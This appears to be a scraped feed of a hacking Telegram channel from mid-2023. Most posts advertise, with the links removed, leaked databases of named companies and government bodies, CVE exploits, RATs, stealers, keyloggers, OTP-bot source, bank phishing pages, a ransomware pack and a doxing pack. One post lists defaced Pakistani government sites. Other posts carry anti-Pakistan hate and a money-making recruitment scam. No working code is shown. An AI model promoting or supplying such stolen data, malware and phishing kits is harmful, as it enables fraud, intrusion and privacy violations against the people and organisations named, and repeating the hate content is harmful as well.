I found this super amazing GitHub repository 😼In this repo you'll find cheat sheet of- HTML- CSS- JavaScript- jQuery- Git- Gulp🧑🏻‍💻 @zEdCodes ⬅️
2023-06-28 04:34:21
‼️ 𝙇𝙖𝙩𝙚𝙨𝙩 𝙉𝙚𝙬𝙨 ‼️𝙍𝙚𝙥𝙤𝙅𝙖𝙘𝙠𝙞𝙣𝙜 - 𝘼 𝙀𝙭𝙥𝙡𝙤𝙞𝙩 𝙞𝙣 𝙂𝙞𝙩𝙝𝙪𝙗. 𝙈𝙖𝙠𝙚 𝙨𝙪𝙧𝙚 𝙮𝙤𝙪 𝙘𝙝𝙚𝙘𝙠 𝙮𝙤𝙪𝙧 𝙂𝙞𝙩𝙝𝙪𝙗 𝙍𝙚𝙥𝙤𝙨𝙞𝙩𝙤𝙧𝙮 ✅𝙇𝙞𝙣𝙠:
2023-06-27 18:15:26
Stop paying $10/mo for Midjourney.Use these 5 FREE image generator tools instead:1) Bluewillowbluewillow.ai2) Leonardoleonardo.ai4) Stablediffusionstablediffusionweb.com5) Night
2023-06-27 18:15:25
2023-06-27 10:18:38
🧮Dataleaks:🔅🔆⚜️🔰Equipo (American healthcare IT provider) Data Leak :🔅🔆⚜️🔰Kooness (British painting sale website) Data Leak :🔅🔆⚜️🔰SchoolTry (Nigerian school administration program) Data Leak :🔅🔆⚜️🔰Qvoss (South Korean digital signage company) Leak :🔅🔆⚜️🔰FlyerCo (American flyer manufacturer & designer) Data Leak :🔅🔆⚜️🔰TopTech1 Inc. Data Leak :🔅🔆⚜️🔰HENSOLDT France leaked :🖥Exploit :🔅🔆⚜️🔰Symfony Secret Fragment exploit :🛠Tools:🔅🔆⚜️🔰PeStudio Pro 9.52 Download :🔅🔆⚜️🔰Telegram OTPBOT Source Code :🔅🔆⚜️🔰Sophia Script for Windows :
2023-06-27 02:09:46
2023-06-26 16:59:31
2023-06-26 15:58:43
2023-06-26 15:58:33
CrackCodes 🇮🇳 pinned «🖥Exploits: 🔱Dao-Exploit : 🔱CVE-2023-34835 XSS Exploit - eScan Management Console 14.0.1400.2281 : 🖥DataLeaks: 🔱Viva Air Columbia Data…»
2023-06-26 14:00:59
🖥Exploits:🔱Dao-Exploit :🔱CVE-2023-34835 XSS Exploit - eScan Management Console 14.0.1400.2281 :🖥DataLeaks:🔱Viva Air Columbia Data Leak :🔱CITI Bank Leaks :🖥Tools:🔱Acunetix v15.7 - 09 May 2023 :🔱PROFILEGPT - Tool for analyzing profiles and hashtags on Twitter :🖥Keylogger:🔱AutoLOG V1 Keylogger : | |
2023-06-26 11:44:47
2023-06-26 11:09:50
🕵Hacking Learning Special Channel 👀° ͜ʖ ͡ -This channel is Collection of Paid and Leaked All Hacking tutorial.° ͜ʖ ͡ -you will get here all mostly Hacking tutorial and Tools.☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️☠️🎩JOIN NOW🎩☠️Learn then Earn
2023-06-26 09:10:43
Pakistan's Interior Minister Rana Sanaullah has said that if 1000 Pakistani innocent people are hanged or shot, the situation in Pakistan will be fine.It shows that Pakistan is a terrorist and murderous country which will kill its innocent people in order to improve the situation of the country.Pakistan is a terrorist countryPakistan is a murderous country Images
2023-06-26 08:44:57
2023-06-26 05:00:44
𝙁𝙞𝙡𝙚 𝙐𝙥𝙡𝙤𝙖𝙙 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮📂🦗𝙏𝙤𝙥𝙞𝙘𝙨 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What how File Upload Functionality works. 2. How to create a Web - shell 3. Different Test-Cases of File Upload Vulnerability =>RCE via File Upload => XSS via File Upload& Many More𝙇𝙞𝙣𝙠:𝙋𝙡𝙚𝙖𝙨𝙚 𝙎𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙑𝙞𝙚𝙬𝙨 🙏🏻☺️
2023-06-26 04:54:46
Read my latest blog here: - Cybersecurity in the Age of Artificial Intelligencelink :-
2023-06-25 18:34:58
2023-06-25 13:30:46
🖥Dataleaks:🔱Riedis_lt data Leak :🔱Revest Paper ( Data leak :🖥Tools:🔱limba - compile-time control flow obfuscation using mba :🔱Joomla Security Scanner :🔱XiaoMiTool V2 + TFT Unlocker :🔱Garud - Subdomain Collection and Vulnerability Finder Tool :🔱Logsensor - A tool to find login panels and test them in SQLi :🖥RAT:🔱CraxsRat v4.9.5 Download :🖥Phishing Page:🔱CITI bank Phishing Letter : | |
2023-06-25 09:46:57
𝙇𝙚𝙖𝙧𝙣 𝙒𝙚𝙗 𝘾𝙖𝙘𝙝𝙚 𝙋𝙤𝙞𝙨𝙤𝙣𝙞𝙣𝙜 👀👌𝙇𝙞𝙣𝙠:
2023-06-25 06:24:33
2023-06-24 14:44:38
CrackCodes 🇮🇳 pinned «🖥Instagram DOS Exploit: 🔱Instagram App - Denial of Service : 🖥Dataleaks: 🔱Leland Campbell LLP Leak :…»
2023-06-24 14:30:40
🖥Instagram DOS Exploit: 🔱Instagram App - Denial of Service :🖥Dataleaks:🔱Leland Campbell LLP Leak :🔱Ulyanovsk Instrumentation and Repair Plant ( Data Leak :🔱Yayasan Tifa (Tifa Foundation Data Leak :🔱National Institute of Cardiovascular Diseases, Bangladesh Data Leak :🔱{azadijobs_com} Bangladesh AzadiJob Company Data Leak :🖥Exploit & POC:🔱CVE-2023-35840 elFinder < 2.1.62 - Path Traversal vulnerability POC :🔱CVE-2023-34599 POC - Multiple Cross-Site Scripting (XSS) in Gibbon v25.0.0 :🖥Tools:🔱NimExec - Fileless Command Execution for Lateral Movement in Nim :🔱PrimusC2 - A C2 framework :🖥Rat:🔱S500 Rat : | |
2023-06-24 10:21:34
2023-06-24 10:03:18
2023-06-23 17:28:19
2023-06-23 12:14:44
2023-06-23 08:49:01
🖥Database:🔱Sindad_com Leak database :🔱SkyBuzz – Motivational Images App Data Leak :🖥Exploit:🔱CVE-2023-27372 Exploit SPIP before 4.2.1 allows Remote Code Execution :🖥Stealer & Builder:🔱HTA Exploit Builder :🔱Prynt Stealer Download : | |
2023-06-22 18:01:10
Top 7 Google Dorks You Need to Know🚀 Cache : This dork will show you the cached version of any website.• cache : example• com🚀 After : This dork will give you result after like :• After : 2019, After : 2016 ( Use with Site Dork )🚀 Allintext : Searches for specific text contained on any web page.• allintext : admin 🚀 Allinurl : exactly the same as allintext, but will show pages that contain titles with "X" characters.• allinurl : "password"🚀 Anchor Tag : this is useful when you need to search for an exact anchor text used on any links.• "Some_Text" Filetype : php ✨Another dork that Works like same as filetype is ext :• "python" ext : pdf🚀 Allinurl : It can be used to fetch results whose URL contains all the specified characters.• allinurl :"login"🌟 Learn how to hack with Google Dorks (Free Tutorial)👉
2023-06-22 07:44:05
🖥Data Leaks :🔱Bombardier Recreational Products ( Leak :🔱nde_gov_br Database leak :🔱Leak Simón Bolívar Adventist School ( Database :🖥Tools: 🔱HCL AppScan Standard v10.2.1 :🔱Qualcomm baseband scripts (reverse Engineering) :🔱The Deepfake Offensive Toolkit :🖥Exploits:🔱CVE-2023-1454 Jeecg-Boot-qurestSql-SQLvuln Exploit :🔱CVE-2023-30347 Exploit : Reflected Cross-Site-Scripting in Neox Contact Center :🖥ScamPages:J🔱PMorgan Chase Bank Phishing Page : | |
2023-06-22 04:48:03
𝙏𝙤𝙥 3 𝘾𝙮𝙗𝙚𝙧 𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙀𝙢𝙚𝙧𝙜𝙞𝙣𝙜 𝙏𝙧𝙚𝙣𝙙𝙨 😱𝙇𝙞𝙣𝙠:
2023-06-21 14:46:43
CrackCodes 🇮🇳 pinned «🖥Dataleak: 🔱DataLeak uprint_id : 🔱Leak RaidForums : 🔱Leak Santander bank Mexico :…»
2023-06-21 14:44:10
Who wanna work with meJoin Fast Limited Seats AvailableMonthly Earning Depends on your work Minimum 4000₹ - 5000₹/Month earning Guaranteed...No Education Qualification Required, 4-5 hours of work... Best for Students and For Those Who has nothing at that time..I'm personally monitoring this work1 Hour Left 😈.Today Session Going To Rock Because We Have Amazing Offer For You all Right now...🔥🔥🔥Jo Miss karega Wada Hai... Ek Month mein Usko Pachtana na padd jaaye toh Kahna....[ Who missed this session... I'm definitely sure they regret within a Month after seeing Results ]🤑🤑🤑🤑🤑🤑🤑🤑🤑🤑 Session on Make Money 4000₹-5000₹ just by giving 4-5 hours a Day....We make LinkedIn Account 1Account = 50 Connections = 25₹1 Account = 500+ Connections = 50₹Share Everywhere Because Today is Last VC of This June Month...
2023-06-21 12:59:29
🖥Dataleak:🔱DataLeak uprint_id :🔱Leak RaidForums :🔱Leak Santander bank Mexico :🔱Leak Tour Partner Group ( :🖥Exploits:🔱MiniDLNA <=1.3.2 (CVE-2023-33476) Exploits :🔱CVE-2023-20178 PoC for Arbitrary File Delete vulnerability in Cisco Secure Client :🔱CVE-2023-25610 RCE vulnerability in FortiOS :🔱CVE-2023-30777 Exploit Reflected XSS vulnerability in the Advanced Custom Fields WordPress plugin :🖥Rat:🔱GCR-Google-Calendar-RAT :🖥Tools:🔱Mantra - A tool used to hunt down API key leaks in JS files and pages :🔱IIS Short Name Scanner - 2012-2023 : | |
2023-06-21 06:38:32
❇️ Web Hack Tool Links❇️ WordPress admin finder 🔗 Link :❇️ Smb scanner tool 🔗 Link :❇️ Heart Bleed scanner 🔗 Link :❇️ weevely php web shell🔗 Link :❇️ Webponized web shell🔗 Link :❇️ Nikto web scanner tool🔗 Link :❇️ Auto Ip or domain Attacking Tool 🔗 Link :❇️ Click jacking vulnerability scanner 🔗 Link :❇️ All in 1 information gathering and web penetration tool DTect🔗 Link :❇️ Detect phishing URL 🔗 Link :❇️ Dos attack tool - Golden eye🔗 Link :❇️ Dos attack with hulk🔗 Link :❇️ Sql vulnerability scanner 🔗 Link :❇️ hack website with sqlmap🔗 Link :❇️ information and vulnerability scanner with striker 🔗 Link :❇️ web server attacking tool with dost 🔗 Link :❇️ advanced multithreaded admin panel finder 🔗 Link :❇️ Ssl vulnerability scanner 🔗 Link :❇️ sublister - Subdomain enumeration🔗 Link :❇️ WordPress vulnerability scanner and attacker🔗 Link :❇️ Hunner scanner framework🔗 Link :❇️ Red hawk all in 1 information gathering and scanning tool🔗 Link :❇️ Dos attack tool with Xerxes🔗 Link :❇️ social fish phishing tool 🔗 Link :❇️ weeman phishing tool no root 🔗 Link :❇️ WordPress security scanner Wpseku 🔗 Link :❇️ IDN homograph attack tool🔗 Link :❇️ Detect security flaws with CMS 🔗 Link :❇️ Fire crack , admin, finders,  deface, bing dorking etc 🔗 Link :❇️ Pish web tool🔗 Link :❇️ MITM attack tool 🔗 Link :❇️ kill shot pentesting framework🔗 Link :ᴡᴇ ᴅᴏɴ'ᴛ ɴᴇᴇᴅ ᴀɴʏ ᴏᴛʜᴇʀ ᴛʜɪɴɢs ᴊᴜsᴛ ʀᴇᴀᴄᴛ ᴏɴ ᴘᴏsᴛs ᴀɴᴅ ᴍᴀᴋᴇ ᴜs ʜᴀᴘᴘʏ ❤️
2023-06-20 16:11:03
Exploits: 🔱CVE-2023-1829 Exploit :🔱Hammulator framework POC :🔱Exploits for a heap overflow in MiniDLNA <=1.3.2 (CVE-2023-33476) : | |
2023-06-20 13:39:35
No matter where you hide Indian Security Agencies will find you 🇮🇳🔥
2023-06-20 10:06:24
2023-06-19 14:27:58
Who wanna work with meDm Fast Limited Seats AvailableMonthly Earning Depends on your work Minimum 4000₹ - 5000₹/Month earning Guaranteed...No Education Qualification Required, 4-5 hours of work... Best for Students and For Those Who has nothing at that time..I'm personally monitoring this workDm Here @lexlegionWe got more than 100 DMs within an hour so that's why it's very difficult to message everyone ana call everyone and explain all processes...That's why I will try to share my telegram group link... Join There Today we are going to explain live What's the exact work... And how to you can able to earn money just doing some normal thingsJoin My Telegram Group know me Please promote my Post in your group for help Others...Today Live VC Timing @9 p.m.Join fast and Grab the Amazing Opportunity...
2023-06-19 05:58:08
🖥Exploits:🔱CVE-2023-29343 Arbitrary file write in Sysmon version 14.14 Exploit :🔱CVE-2022-44666 jar-poc :🖥Dataleaks:🔱Leak Safiran Airport Services Company :🔱Leak dashboard.bkkbn_go_id :🔱Leak islamicreminder_net :🔱Leak newmtcap_com_br :🖥Tools:🔱Payloads All The PDFs - A list of crafted malicious PDF files :
2023-06-19 04:51:30
𝙈𝙤𝙨𝙩 𝙪𝙣𝙙𝙚𝙧𝙚𝙨𝙩𝙞𝙢𝙖𝙩𝙚𝙙 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮 : 𝘾𝙊𝙍𝙎 𝙈𝙞𝙨𝙘𝙤𝙣𝙛𝙞𝙜𝙪𝙧𝙖𝙩𝙞𝙤𝙣𝙏𝙊𝙋𝙄𝘾:1. What is SOP? 2. Working of CORS. 3. CORS Script (Given in desc) 4. Practical Labs of CORS. 𝙇𝙞𝙣𝙠:
2023-06-18 14:12:47
2023-06-18 07:50:46
2023-06-18 03:39:58
🔱Leak Fiduagraria is a joint-stock company :🔱CVE-2023-34830: Reflected XSS found in i-doit Open : | |
2023-06-16 17:21:04
2023-06-16 13:50:21
🔱Leak BilgeAdam IT Group :🔱data leak of Concremat Companies :🔱Banshee _ Windows x64 Kernel Driver/Rootkit :🔱phishing script Sberbank online :🔱skybuzz Leak :🔱MobSecco | Clone Cordova application for bypassing security restrictions :
2023-06-16 04:47:29
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Web-Cache Poisoning𝙇𝙞𝙣𝙠:
2023-06-15 15:54:27
2023-06-15 14:33:38
Legion SMTP v6.5 Latest : : corp GHE : Turkish football club Trabzonspor : | | |
2023-06-15 06:37:24
𝘽𝙪𝙜𝙗𝙤𝙪𝙣𝙩𝙮 𝙑𝙨 𝘼𝙄𝙇𝙞𝙣𝙠:
2023-06-15 06:01:38
Webinar: OSINT: The Ultimate Truth-Seeker on the InternetWelcome to the "Introduction to OSINT" workshop, where we will cover essential topics for beginners interested in Open-Source Intelligence (OSINT) techniques! In this workshop, you will learn about the fundamentals of OSINT and how to apply them in your investigations.We'll begin by discussing what OSINT is and how it differs from OSINF (Open-Source Information). We'll also explore the intelligence cycle and how it relates to OSINT investigations. You'll learn about the different phases of the cycle, including planning and direction, collection, processing and exploitation, analysis and production, and dissemination.Next, we'll delve into technical and non-technical OSINT, explaining the differences between the two. You'll learn how to use tools and techniques like Google search operators, metadata analysis, and social media monitoring to collect information online.We'll also touch on the topic of Darkweb and explain what it is and how it works. You'll gain an understanding of the difference between the surface web, deep web, and dark web and the challenges associated with conducting OSINT investigations in these areas.Finally, we'll wrap up the workshop by discussing Darkweb OSINT and how to conduct investigations in the dark web safely and effectively. You'll learn about the legal and ethical considerations involved in dark web investigations, as well as the tools and techniques used to access and gather information from hidden services.By the end of this workshop, you'll have a solid understanding of OSINT investigations and be able to apply the techniques learned to find valuable information online. Whether you're a student, researcher, or just someone curious about OSINT, this workshop has something for you!Join us for an interactive and informative session where you can enhance your knowledge and skills in OSINT investigations and uncover the truth behind any online activity!Date: June 17th, 2023Venue: OnlineTime: 9:30PM to 10:30PMContact: community.cyberverse@gmail.comRegister Now:
2023-06-15 05:08:34
gmail-osint.activetk.jpGhunt online version.Get info about Google account by email:- name- default profile and cover pictures;- calendar events and timezone;- Google Maps reviews;- Google Plus and Google Chat data;#osint #socmint Images
2023-06-14 18:16:45 Vikash chaudhari bug hunting coursePosted by - @stranger_0_0
2023-06-14 14:50:17
Anyone Taking part in Darkwebathon 2023 BY Team ATII Dm @hacklathon
2023-06-14 14:20:49
🖥Databases:🔱Leak areashopping_eu :🔱Leak sportfood40_ru :🔱Leak sport-fashion_sk :🖥Exploits:🔱Ubuntu 22.04 - udmabuf, CVE-2023-2008 Exploit :🔱CVE-2022-4262: Incorrect Bytecode Generation by JavaScript Parse POC :🖥Tools:🔱TheRestarter is a tool is designed to interact with the Windows Restart Manager. : | | | |
2023-06-14 06:48:42
𝙎𝙌𝙇 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝙊𝙣𝙚𝙡𝙞𝙣𝙚𝙧 ✨𝙇𝙞𝙣𝙠:
2023-06-14 05:33:42
2023-06-14 05:13:03
CVE-2023-20887 VMWare Aria Operations for Networks unauthenticated RCE Exploit
2023-06-13 17:38:00
2023-06-13 15:12:11
2023-06-13 11:21:24
CrackCodes 🇮🇳 pinned a photo
2023-06-13 11:19:40
🖥Dataleak:🔱Leak Us army DB 9GB :🔱Sindad_com website database Leak :🖥Exploits:🔱CVE-2023-2008 Exploit :🖥Tools:🔱onedrive_user_enum v2.00 :🔱NodeCraw (Web Crawling Application):🖥Bank SCam Pages:👉🏻American Express,👉🏻Bank BNP Paribas👉🏻Bank OF America👉🏻Bankok Bank👉🏻Chase Bank👉🏻Discover Online Bank👉🏻Dubai Islamic Bank👉🏻Halifax UK Bank👉🏻M&T Bank👉🏻MKB Bank👉🏻Rabobank NL👉🏻Sparkasse Bank👉🏻capitalOne🖥Course:🔱Station X - The Complete Cyber Security Course - Volumes 1, 2, 3 & 4 :🖥Rat & Stealers:🔱EXO STUB Stealer Source Code Leak :🔱Anubis-8.0-RAT : | | | |
2023-06-13 07:57:33
Bykea is likely targeted/compromised by Indian hackers.pakistani biggest bike ride company hacked 😆everyone go to twitter and search for #bykea
2023-06-13 04:46:10
𝘾𝙮𝙗𝙚𝙧𝙩𝙞𝙭 𝙉𝙚𝙬𝙨 : Bugbounty vs AI😍✨𝙇𝙞𝙣𝙠:
2023-06-12 21:25:11 10 Best Browsers for Security and Privacy
2023-06-12 16:41:20
Subject: Invitation to Join DarkForum: Unleash Your Hacking Potential...Dear Hackers...❔We are excited to extend our invitation for you to join DarkForum, a thriving community dedicated to the exploration of hacking, cybersecurity, and digital knowledge. As an aspiring hacker or an experienced cybersecurity enthusiast, DarkForum offers an exceptional platform where you can connect with like-minded individuals, access valuable resources, and contribute your expertise.DarkForum is home to a diverse group of contributors who are passionate about hacking, sharing their knowledge, and pushing the boundaries of cybersecurity. Within our community, you'll find a treasure trove of hacking resources, tools, tutorials, and even leaked data (for educational purposes only), all designed to enhance your skills and expand your understanding of the digital realm.By joining DarkForum, you gain access to a world of opportunities: Hacking Resources: Discover an extensive collection of resources covering a wide range of hacking techniques, methodologies, and tools. Learn about advanced penetration testing, network security, cryptography, and more. Explore the latest hacking trends and stay up-to-date with emerging technologies. Collaboration and Networking: Connect with fellow hackers, share your experiences, and engage in stimulating discussions. DarkForum provides a platform for you to collaborate on projects, exchange ideas, and build professional relationships within the cybersecurity community. Exclusive Leaked Datas: Gain access to a carefully curated collection of leaked data (legally obtained), which serves as an invaluable resource for understanding real-world security breaches and vulnerabilities. Analyze and learn from these incidents to strengthen your own defenses. Contributing and Sharing: As a member of DarkForum, you are encouraged to contribute your own expertise and resources. Share your discoveries, insights, and tools with the community, fostering a spirit of collective learning and growth.To join DarkForum, simply click on the following link: []. The registration process is quick and straightforward, and you'll be granted immediate access to all the resources and discussions that await you.Please note that DarkForum upholds the principles of hacking and responsible information sharing. Take this opportunity to unleash your hacking potential and contribute to the ever-evolving field of cybersecurity. Join DarkForum today and become part of a vibrant community dedicated to expanding knowledge and pushing the boundaries of digital security.We eagerly await your arrival and look forward to witnessing your valuable contributions within DarkForum.Happy hacking!Best regards,☠️ Lèx Légîøn ☠️🌐Dark Forum Contributor & DarkForum Promotor Team
2023-06-12 16:23:23
2023-06-12 11:26:11
Must Watch
2023-06-12 03:26:37
Database:Leak Apple Devices 2023 : vitaexpress_ru : to rootless iOS : Tutorial :
2023-06-11 17:12:15
CrackCodes 🇮🇳 pinned a photo
2023-06-11 04:33:28
🖥Dataleak:🔱Leak Alibaba Cloud 💭 :🔱Leak aub_ma :🔱Leak pannonhosting_hu:🔱Leak astrongameclub_gr :🔱Leak dheeramotors_com :🔱Leak forexchanger_com :🖥Tools:🔱Ransomware tool pack :🔱RedLotus is a Windows UEFI Bootkit in Rust :🔱QuillBot-Premium-Crack-2.0.1 :🔱Automatic XSS Vulnerability Scanner, Dorker, and Payload Injector :🖥Exploits:🔱CVE-2023-0630: Slimstat Analytics <4.9.3 – Subscriber + SQL Injection :🔱CVE-2020-3187 Exploit :🖥Material: 🔱Doxing Pack :🔱recon2023-resources: | (
2023-06-10 15:04:06
2023-06-10 09:25:33
2023-06-10 03:47:09
🖥Database:🔱Leak shop_goldheart_com :🔱Leak bazar365_com :🔱Leak bananedu_com :🔱Leak clubmaster_com :🔱Leak leroymerlin_fr :🔱Leak kprayrada_gov_ua :🔱Leak kamrairada_gov_ua :🖥Tools:🔱FSUntether – is a Fucking Simple Untethered code execution PoC for iOS 15,16,17 :🖥POCs:🔱CVE-2023-32353: Local privilege escalation via iTunes in Windows : | (
2023-06-09 12:01:21
CrackCodes 🇮🇳 pinned «🖥Dataleak: 🔱Leak auchan(.)ru : 🔱Leak askona(.)ru : 🔱Leak Leak book24(.)ru: 🔱BSI (Bank Syariah Indonesia) All employeers Leak : https:…»
2023-06-09 07:16:48
2023-06-09 07:06:55
2023-06-09 04:57:25
🖥Database:🔱leak of the airline Lnea Aérea Amaszonas S.A. :🔱Leak solicitudesglpi(.)dnsalias(.)net :🔱Leak goldstockcanada(.)com :🔱Leak realtimetopup(.)com :🖥Tools:🔱UTopia is a tool for automatically generating fuzz drivers :🔱Instagram-Lookup :🖥Exploit:🔱libssh CVE-2023-2283 POC exploit :🔱CVE-2023-29336 Win32k Privilege Escalation Vulnerability with PoC :🔱CVE-2023-32353 PoC Exploit :
2023-06-08 17:51:03
2023-06-08 07:53:00
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: File Upload Vulnerabilities. 𝙇𝙞𝙣𝙠 :
2023-06-08 05:50:14
2023-06-08 04:54:45
🖥Dataleak: 🔱Leak auchan(.)ru :🔱Leak askona(.)ru :🔱Leak Leak book24(.)ru:🔱BSI (Bank Syariah Indonesia) All employeers Leak :🔱Leak uprz(.)ru :🖥Exploit:🔱CVE-2023-25157 GeoServer SQL Injection – PoC :🔱Public key authentication bypass in libssh POC :🔱CVE-2023-33829: SCM Manager XSS:🖥ToolS:🔱SMSCaster a Tool to send Sms with GSM senders :🔱ATM Scanner Vulns :
2023-06-08 02:20:36
🔥Must Read Articles for Every Hacker🔥(Part 1)▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁✅ RoadMap to Become Ethical Hacker/Penetration Tester🔗Link :✅ How to Learn Cyber Security Fast🔗Link :✅ How to Become Successful Bug Bounty Hunter (RoadMap)🔗Link :✅ How to Bypass 2FA & MFA 🔗Link :✅ Complete Tutorial of CTF (Beginner to Advance)🔗Link : ¦ Share ¦ Support
2023-06-07 04:15:20
🖥Dataleak:🔱Leak gabo hu :🔱Leak pay concord ua:🔱Leak Ashan Technologies :🔱Leak aminter co th:🔱Leak ( Pakistan :🖥Rats:🔱Nanocore 2023 Rat :🖥Exploit:🔱CVE-2022-32902 PoC exploit :
2023-06-06 06:24:48
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: URL RedirectionURL redirection is a technique that forwards users from one web address to another, commonly used for website rebranding, page updates, or directing traffic from old URLs to new ones. It ensures a seamless user experience and helps maintain search engine ranking and link equity.𝙇𝙞𝙣𝙠: Share your Views & Thanks for your support☺️
2023-06-06 05:04:58
🔱DataLeak:👉🏻Leak memechat app:👉🏻paybito com Leak :👉🏻school mos ru Leak:👉🏻tendermines com Leak:👉🏻The National University of Taiwan:👉🏻Bank of America Leak :👉🏻stripchat-com Leak :🔱Tools:👉🏻FCBOTv2.0 OTP Bot Source Code :🔱Phishing Pages:👉🏻POST BANK WITH LIVE PANEL Phishing Pages :
2023-06-05 15:49:46
2023-06-05 10:30:02
🖥Dataleak:👉🏻MSI (Micro-Star International Co., Ltd) :👉🏻Leak cryptofalka :
2023-06-05 06:17:19
🖥Database:👉🏻Leak thegrand rentals :👉🏻Leak bursakameraprofesional co id:👉🏻Leak go3gift com :🖥Phishing Pages:👉🏻FUD T-Mobile USA Scampage :
2023-06-04 19:01:25
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: DOM XSS𝙇𝙞𝙣𝙠:
2023-06-04 18:25:29
2023-06-04 16:56:20
2023-06-04 13:06:15
DataLeak:👉🏻Leak haztutienda com :👉🏻Leak voiswitch :👉🏻Leak :👉🏻Pyrai - Mirai python variant :👉🏻CVE-2023-33246 RocketMQ Remote Code Execution Exploit :
2023-06-04 06:58:47
Injecting scripts into web pagesDraining the theme of injections, chromium extension for working with botsFunctional:Injecting scripts into web pagesCollection of cookies in .json formatSending PUSH notificationsCreate a hidden screenshot of the current browser screenView all installed extensions and enable/disable themGetting the actual URL where the bot is locatedDownload browser history in .json formatUsing the bot’s IP and its cookies (reverse proxy)link price on the forum : 5.000$Download:
2023-06-04 04:46:11
2023-06-04 03:51:30
==================☠️[SITE]: https://mopa(.)gov(.)pk♾️[PROOF]:☠️[SITE]: https://pifra(.)gov(.)pk♾️[PROOF]:☠️[SITE]: https://pspc(.)gov(.)pk♾️[PROOF]:☠️[SITE]: https://nspp(.)gov(.)pk♾️[PROOF]:☠️[SITE]: http://csa(.)gov(.)pk♾️[PROOF]:☠️[SITE]: http://ecopsc(.)gov(.)pk♾️[PROOF]:☠️[SITE]: https://pbrr(.)gov(.)pk♾️[PROOF]:☠️[SITE]: http://ncndt(.)org(.)pk♾️[PROOF]:☠️[SITE]: https://onsa(.)gov(.)pk♾️[PROOF]:
2023-06-03 22:11:43
2023-06-03 15:00:59
🖥Tools:👉🏻LightsOut : Generate an obfuscated DLL that will disable AMSI & ETW👉🏻Binder Trace is a tool for intercepting and parsing(trace, filter and inspect) Android Binder messages. Think of it as "Wireshark for Binder".Very useful when Android reversing and VR.
2023-06-03 12:16:13
I Want A VPS If SomeOne VPS Seller Contact Me@MynK0x00
2023-06-03 11:12:35
2023-06-03 08:35:03
Real time attempts to break into my servers by attackers trying to guess usernames and passwords. No legitimate services are offered on the addresses receiving these attempts, so there is no chance of a real user accidently submitting their credentials. (Yes things other than SSH occasionally show up)
2023-06-03 07:15:35
Leak Databases:👉🏻Leak bamsi org :👉🏻Al Tamimi:👉🏻KittyStager: simple stage 0 C2. It is made of a web server to host the shellcode and an implant, called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.
2023-06-02 20:26:11
2023-06-02 14:51:18
*⚠️ Researchers claim Windows “backdoor” affects hundreds of Gigabyte motherboards ⚠️*_It's a backdoor, Jim, but not as we know it... here's a sober look at this issue._Link: _"Naked Security"_#hacker_bano_chutiya_nhe 🫂
2023-06-02 14:35:36
💥CVE-2017-6195 (SQL-Injection in MOVEit Transfer aka MOVEit DMZ)
2023-06-02 13:48:24
🔱Database Leaks: // : // // // //🔱Crack Softwares: v15.6 Crack:
2023-06-02 10:06:22
2023-06-02 06:51:26
Here are some suggestions for practicing Python:Write code: One of the best ways to practice Python is to write code. You can start by working through tutorials and exercises to get a feel for the language, and then try writing your own small programs.Solve problems: There are many websites and resources that offer programming challenges and exercises. You can use these to practice your Python skills by solving problems and writing code to solve them.Work on a project: Choose a project that interests you and use Python to build it. This could be a simple program or a more complex application. Working on a project will give you a chance to apply your skills and learn new concepts.Join a community: There are many online communities and forums where you can ask questions and get help with your Python learning. You can also join local meetups or groups to connect with other Python learners and developers.Use online resources: There are many online resources and tutorials available for learning Python. You can use these to learn new concepts and practice your skills.Remember to be patient and persistent as you practice Python. It can take time to become proficient in any new skill, but with practice and dedication, you will improve.
2023-06-02 06:48:10
The easiest way to learn a programming language is to first learn the basics and then try to build something with it (learn by doing). And it's better if you are building something you are actually interested in rather than something out of a book because it will get you to think about the problem and be more meaningful.Python is easy to learn (not much syntax), easy to read (explicit vs implicit), has a big ecosystem (more packages/libraries), is taught at universities so it's easy to find good programmers to help, and is used by many large websites/companies (e.g., Quora is programmed in Python) so it's a good language to know.Online Python Tutorials (in order from introductory to more advanced):"A Byte of Python"'s Into to Python Class (online) -"Dive Into Python", by Mark Pilgrim"The New Boston" Programming Python Tutorials -"Building Skills in Python", by Steven F. Lott -"Think Python: How to Think Like a Computer Scientist" -"Code Like a Pythonista: Idiomatic Python" - MIT 6.00 Introduction to Computer Science and Programming - 6.01 Course Readings (PDF) -'s "Understanding Python" (more advanced talk) -"A Guide to Python's Magic Methods" -"Metaclasses Demystified" - to Get: "Python Cookbook", by Alex Martelli ( if you're building something Web based, look at using the Flask Web Framework ( is a modern, lightweight, and well-documented Python Web framework so you won't have to spend much time learning it or fighting with it -- you won't find yourself asking, "Will I be able to do what I want in the framework without hacking it?" Flask let's you program in Python rather than writing to the framework like you typically have to in larger, opinionated framework's like Django and Rails.
2023-06-01 16:30:28
2023-05-31 15:51:48
Hacklido's Bi-Monthly Newsletter's First version is up on Substack! Make sure to subscribe for awesome Newsletter content.
2023-05-31 11:24:35
𝙐𝙍𝙇 𝙍𝙚𝙙𝙞𝙧𝙚𝙘𝙩𝙞𝙤𝙣 𝙬𝙞𝙩𝙝 𝙩𝙝𝙚 𝙝𝙚𝙡𝙥 𝙤𝙛 𝙉𝙪𝙘𝙡𝙚𝙞 𝙏𝙚𝙢𝙥𝙡𝙖𝙩𝙚.
2023-05-31 01:39:00
2023-05-30 21:12:02
2023-05-30 13:47:47
2023-05-30 06:00:12
If SomeOne Have Python Based Hosting Or Any VPS Contact Me @MynK0x00
2023-05-30 01:28:49
2023-05-29 18:36:08
